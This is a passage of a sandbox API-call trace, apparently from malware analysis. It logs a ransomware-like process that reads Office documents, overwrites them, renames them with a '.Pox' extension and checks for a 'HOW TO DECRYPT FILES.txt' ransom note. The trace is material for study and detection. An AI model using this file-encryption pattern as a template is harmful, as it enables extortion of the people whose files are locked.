FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0039.623] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx", lpFilePart=0x0) returned 0x55 [0039.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0039.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\diuwgpxxpjm-b6t5u9y.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.625] GetFileType (hFile=0x26c) returned 0x1 [0039.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0039.625] GetFileType (hFile=0x26c) returned 0x1 [0039.625] WriteFile (in: hFile=0x26c, lpBuffer=0x34cd428*, nNumberOfBytesToWrite=0x168e0, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x34cd428*, lpNumberOfBytesWritten=0x3ae4f0*=0x168e0, lpOverlapped=0x0) returned 1 [0039.628] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx", lpFilePart=0x0) returned 0x55 [0039.628] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx.Pox", lpFilePart=0x0) returned 0x59 [0039.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0039.628] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\diuwgpxxpjm-b6t5u9y.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57467680, ftCreationTime.dwHighDateTime=0x1d4d1d2, ftLastAccessTime.dwLowDateTime=0x9703c660, ftLastAccessTime.dwHighDateTime=0x1d4c674, ftLastWriteTime.dwLowDateTime=0x29cc7460, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x168e0)) returned 1 [0039.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0039.628] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\diuwgpxxpjm-b6t5u9y.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\diuwgpxxpjm-b6t5u9y.xlsx.pox")) returned 1 [0039.629] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt", lpFilePart=0x0) returned 0x53 [0039.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0039.629] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\fly6cruyqsrgmwwsdu.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.629] GetFileType (hFile=0x26c) returned 0x1 [0039.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0039.629] GetFileType (hFile=0x26c) returned 0x1 [0039.629] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x6131 [0039.629] ReadFile (in: hFile=0x26c, lpBuffer=0x23e2bb4, nNumberOfBytesToRead=0x6131, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x23e2bb4*, lpNumberOfBytesRead=0x3ae4fc*=0x6131, lpOverlapped=0x0) returned 1 [0039.644] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0039.644] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0039.644] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt", lpFilePart=0x0) returned 0x53 [0039.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0039.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\fly6cruyqsrgmwwsdu.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.645] GetFileType (hFile=0x26c) returned 0x1 [0039.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0039.645] GetFileType (hFile=0x26c) returned 0x1 [0039.646] WriteFile (in: hFile=0x26c, lpBuffer=0x244e13c*, nNumberOfBytesToWrite=0x6140, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x244e13c*, lpNumberOfBytesWritten=0x3ae4f0*=0x6140, lpOverlapped=0x0) returned 1 [0039.647] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt", lpFilePart=0x0) returned 0x53 [0039.647] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt.Pox", lpFilePart=0x0) returned 0x57 [0039.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0039.647] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\fly6cruyqsrgmwwsdu.ppt"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e27a8f0, ftCreationTime.dwHighDateTime=0x1d4ce29, ftLastAccessTime.dwLowDateTime=0xb3de7890, ftLastAccessTime.dwHighDateTime=0x1d4c564, ftLastWriteTime.dwLowDateTime=0x29d13720, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x6140)) returned 1 [0039.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0039.647] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\fly6cruyqsrgmwwsdu.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\FlY6cRuyqsRGmwwsdu.ppt.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\fly6cruyqsrgmwwsdu.ppt.pox")) returned 1 [0039.647] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx", lpFilePart=0x0) returned 0x46 [0039.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0039.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\gxov.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.648] GetFileType (hFile=0x26c) returned 0x1 [0039.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0039.648] GetFileType (hFile=0x26c) returned 0x1 [0039.648] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0xaf45 [0039.648] ReadFile (in: hFile=0x26c, lpBuffer=0x24548cc, nNumberOfBytesToRead=0xaf45, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x24548cc*, lpNumberOfBytesRead=0x3ae4fc*=0xaf45, lpOverlapped=0x0) returned 1 [0039.673] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0039.673] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0039.673] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx", lpFilePart=0x0) returned 0x46 [0039.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0039.674] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\gxov.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.675] GetFileType (hFile=0x26c) returned 0x1 [0039.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0039.675] GetFileType (hFile=0x26c) returned 0x1 [0039.675] WriteFile (in: hFile=0x26c, lpBuffer=0x24c24bc*, nNumberOfBytesToWrite=0xaf50, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x24c24bc*, lpNumberOfBytesWritten=0x3ae4f0*=0xaf50, lpOverlapped=0x0) returned 1 [0039.676] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx", lpFilePart=0x0) returned 0x46 [0039.676] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx.Pox", lpFilePart=0x0) returned 0x4a [0039.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0039.676] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\gxov.docx"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f5b2c70, ftCreationTime.dwHighDateTime=0x1d4d519, ftLastAccessTime.dwLowDateTime=0xaf1aa3e0, ftLastAccessTime.dwHighDateTime=0x1d4cdf4, ftLastWriteTime.dwLowDateTime=0x29d5f9e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xaf50)) returned 1 [0039.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0039.676] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\gxov.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\GXOv.docx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\gxov.docx.pox")) returned 1 [0039.677] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls", lpFilePart=0x0) returned 0x4d [0039.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0039.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\vj ypf-i nn4.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.677] GetFileType (hFile=0x26c) returned 0x1 [0039.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0039.677] GetFileType (hFile=0x26c) returned 0x1 [0039.677] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x15b58 [0039.677] ReadFile (in: hFile=0x26c, lpBuffer=0x34f9bc8, nNumberOfBytesToRead=0x15b58, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x34f9bc8*, lpNumberOfBytesRead=0x3ae4fc*=0x15b58, lpOverlapped=0x0) returned 1 [0039.694] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0039.695] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0039.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls", lpFilePart=0x0) returned 0x4d [0039.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0039.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\vj ypf-i nn4.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.696] GetFileType (hFile=0x26c) returned 0x1 [0039.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0039.696] GetFileType (hFile=0x26c) returned 0x1 [0039.696] WriteFile (in: hFile=0x26c, lpBuffer=0x35664e0*, nNumberOfBytesToWrite=0x15b60, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x35664e0*, lpNumberOfBytesWritten=0x3ae4f0*=0x15b60, lpOverlapped=0x0) returned 1 [0039.698] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls", lpFilePart=0x0) returned 0x4d [0039.698] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls.Pox", lpFilePart=0x0) returned 0x51 [0039.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0039.699] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\vj ypf-i nn4.xls"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6f949e0, ftCreationTime.dwHighDateTime=0x1d4c86e, ftLastAccessTime.dwLowDateTime=0x9aae99e0, ftLastAccessTime.dwHighDateTime=0x1d4cc9e, ftLastWriteTime.dwLowDateTime=0x29d85b40, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15b60)) returned 1 [0039.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0039.699] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\vj ypf-i nn4.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\vJ YPF-i Nn4.xls.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\vj ypf-i nn4.xls.pox")) returned 1 [0039.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx", lpFilePart=0x0) returned 0x4d [0039.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0039.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\yffkdc845c6.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.700] GetFileType (hFile=0x26c) returned 0x1 [0039.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0039.700] GetFileType (hFile=0x26c) returned 0x1 [0039.700] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x174f9 [0039.700] ReadFile (in: hFile=0x26c, lpBuffer=0x357c060, nNumberOfBytesToRead=0x174f9, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x357c060*, lpNumberOfBytesRead=0x3ae4fc*=0x174f9, lpOverlapped=0x0) returned 1 [0039.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0039.717] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0039.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | 